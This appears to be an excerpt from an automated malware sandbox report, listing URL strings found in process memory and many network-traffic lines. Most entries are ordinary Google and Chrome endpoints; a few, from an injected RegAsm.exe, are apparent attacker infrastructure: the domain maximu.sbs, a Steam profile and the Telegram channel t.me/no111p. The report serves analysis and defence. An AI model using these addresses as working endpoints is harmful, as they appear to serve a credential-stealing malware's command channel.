            Source: chrome.exe, 00000005.00000003.1876699858.00006A4001970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876675408.00006A400196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876766629.00006A4001974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876644809.00006A400195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardj
            Source: chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
            Source: chrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
            Source: chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
            Source: chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
            Source: chrome.exe, 00000005.00000003.1830812840.00002E98006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
            Source: chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876494907.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
            Source: chrome.exe, 00000005.00000003.1876049359.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
            Source: chrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maximu.sbs
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maximu.sbs/
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
            Source: chrome.exe, 00000005.00000003.1871271175.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1884942546.00006A4001B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 00000005.00000003.1884942546.00006A4001B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1884942546.00006A4001B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 00000005.00000003.1859041039.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851490995.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852002829.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1884942546.00006A4001B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
            Source: chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
            Source: chromecache_80.8.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
            Source: chromecache_83.8.drString found in binary or memory: https://plus.google.com
            Source: chromecache_83.8.drString found in binary or memory: https://plus.googleapis.com
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: chrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
            Source: sysadmin.exe, 00000000.00000002.1727806429.000001A6CFDF1000.00000004.00000800.00020000.00000000.sdmp, sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199816275252
            Source: RegAsm.exe, 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199816275252js4tnMozilla/5.0
            Source: sysadmin.exeString found in binary or memory: https://steamdb.info/api/GetAppList/
            Source: sysadmin.exeString found in binary or memory: https://steamdb.info/app/
            Source: imoh4w.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: imoh4w.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: imoh4w.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: imoh4w.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111p
            Source: RegAsm.exe, 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111pjs4tnMozilla/5.0
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2322975178.0000000000EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: chromecache_83.8.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: chrome.exe, 00000005.00000003.1870061242.00006A4000298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 00000005.00000003.1859669568.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870242314.00006A4001344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870087270.00006A4001334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870139156.00006A400133C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chromecache_83.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
            Source: chromecache_83.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
            Source: chrome.exe, 00000005.00000003.1881131580.00006A40016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880766906.00006A40016C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880520387.00006A40016AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1881047885.00006A40016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1881084131.00006A40016D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880574158.00006A40016BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880866384.00006A40016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880628267.00006A40016C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880910579.00006A40016D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880706885.00006A40016C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chromecache_80.8.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
            Source: chromecache_80.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
            Source: chromecache_80.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000005.00000003.1870804054.00006A4001370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870274169.00006A4001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870577036.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869994751.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870481787.00006A40012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1870690075.00006A40012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd
            Source: sysadmin.exeString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
